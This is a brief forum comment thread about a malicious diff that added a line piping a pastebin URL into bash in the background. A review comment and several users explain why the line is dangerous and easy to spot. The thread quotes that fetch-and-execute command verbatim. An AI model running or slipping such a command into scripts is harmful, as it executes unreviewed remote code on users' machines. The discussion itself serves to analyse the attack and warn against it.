Comment by dmix
8 years ago
> + curl -s https://ptpb.pw/~x|bash -&
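Review bot: the added line pipes whatever `https://ptpb.pw/~x` returns straight into `bash`, with `-s` silencing curl and the trailing `&` running it in the background, so remote content that can change at any time executes unreviewed and without any checksum or signature check. Reject the line; nothing in the script being patched should fetch and execute code from a URL.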
So much for being sneaky malware, he wasn't even trying to hide it... Any insertion of a `curl` command to some shady-looking TLD piping to bash is going to be a massive red flag to even unsophisticated Linux users.
Not much to see here, fortunately.
That "shady" domain is the official pastebin for freenode's Arch Linux IRC channel.
Even more so: the fact that it's well-known as a pastebin means that it should be obvious data coming from it are user-generated and could come from anyone.